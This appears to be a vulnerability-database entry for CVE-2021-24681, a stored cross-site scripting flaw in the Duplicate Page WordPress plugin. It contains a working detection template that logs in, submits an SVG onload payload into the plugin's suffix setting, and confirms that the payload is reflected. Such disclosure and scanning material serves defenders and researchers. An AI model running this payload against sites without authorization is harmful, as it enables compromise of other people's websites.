CVE-2021-24681: Duplicate Page WordPress - Stored Cross-Site Scripting

日期: 2026-01-08 | 影响软件: Duplicate Page WordPress | POC: 已公开

漏洞描述

Duplicate Page WordPress plugin <= 4.4.2 contains a stored cross-site scripting caused by unsanitized Duplicate Post Suffix settings in output, letting high privilege users execute malicious scripts, exploit requires high privilege user role.

PoC代码[已公开]

id: CVE-2021-24681

info:
  name: Duplicate Page WordPress - Stored Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Duplicate Page WordPress plugin <= 4.4.2 contains a stored cross-site scripting caused by unsanitized Duplicate Post Suffix settings in output, letting high privilege users execute malicious scripts, exploit requires high privilege user role.
  impact: |
    Attackers can execute malicious scripts in the context of the site, potentially leading to session hijacking or defacement.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/9ebdd1df-1d6f-4399-8b0f-77a79f841464
    - https://wordpress.org/plugins/duplicate-page
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24681
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2021-24681
    cwe-id: CWE-79
    epss-score: 0.00793
    epss-percentile: 0.73398
    cpe: cpe:2.3:a:duplicatepro:duplicate_page:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: duplicatepro
    product: duplicate_page
    framework: wordpress
    publicwww-url: "/wp-content/plugins/duplicate-page"
  tags: wpscan,cve,cve2021,wordpress,wp,wp-plugin,duplicate-page,xss,vuln
flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "wordpress_logged_in")
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/options-general.php?page=duplicate_page_settings HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/options-general.php?page=duplicate_page_settings HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        duplicatepage_nonce_field={{wp_nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dduplicate_page_settings&duplicate_post_status=draft&duplicate_post_redirect=to_list&duplicate_post_suffix="><svg/onload=alert(document.domain)>&submit_duplicate_page=Save+Changes

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Saving Please wait...")'
        condition: and
        internal: true

    extractors:
      - type: regex
        group: 1
        name: wp_nonce
        regex:
          - "id=\"duplicatepage_nonce_field\" name=\"duplicatepage_nonce_field\" value=\"(.*?)\""
        internal: true

  - raw:
      - |
        GET /wp-admin/options-general.php?page=duplicate_page_settings&msg=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "duplicate_post_suffix", "\"><svg/onload=alert(document.domain)>")'
        condition: and
# digest: 490a00463044022066be5b4303c8c77c0e42b3fb25fc28bb4cccb115c7b68db784414848312f2cf502205387fa42d3d847b17f3f16fd0ccdf1d746a49b423735905516b99fd87d82513e:922c64590222798bb761d5b6d8e72950

相关漏洞推荐